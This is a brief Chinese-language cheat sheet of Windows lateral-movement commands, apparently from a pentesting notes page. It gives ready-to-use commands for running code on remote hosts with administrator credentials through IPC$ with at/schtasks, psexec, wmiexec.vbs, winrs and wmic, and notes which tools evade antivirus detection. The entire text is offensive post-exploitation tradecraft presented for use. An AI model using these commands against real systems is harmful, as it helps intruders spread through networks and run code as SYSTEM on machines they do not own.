横向移动执行命令

win

ipc&Copy&At&Schtasks

1
2
3
4
net use \\127.0.0.1\ipc$ "password" /user:Administrator
copy c:\test.bat \\127.0.0.1\c$\windows\temp\test.bat
win2003以前系统: at \\127.0.0.1 22:00 c:\windows\temp\test.bat
win7以后系统:schtasks /create /s 127.0.0.1 /sc once /st 22:00 /tn test /tr c:\windows\temp\test.bat /ru system

psexec

1
2
3
4
##免杀,带微软证书签名,但会在远程主机创建一个psexec的服务
psexec -accepteula \\127.0.0.1 -u Administrator -p password -s cmd //交互模式

psexec -accepteula \\127.0.0.1 -u Administrator -p password -s "c:\windows\temp\test.bat" //单行模式

wmiexec

1
2
3
4
##缺点不免杀,会把dll写在默认c盘目录
cscript.exe //nologo wmiexec.vbs /shell 127.0.0.1 Administrator password //交互模式

cscript.exe wmiexec.vbs /cmd 127.0.0.1 Administrator password "whoami" //单行模式

winrs

1
2
##适用于Windows Server 2016,Windows Server 2012 R2,Windows Server 2012
winrs -r:pcname command

wmic

1
WMIC /node:ComputerName process call create “cmd.exe /c start.exe”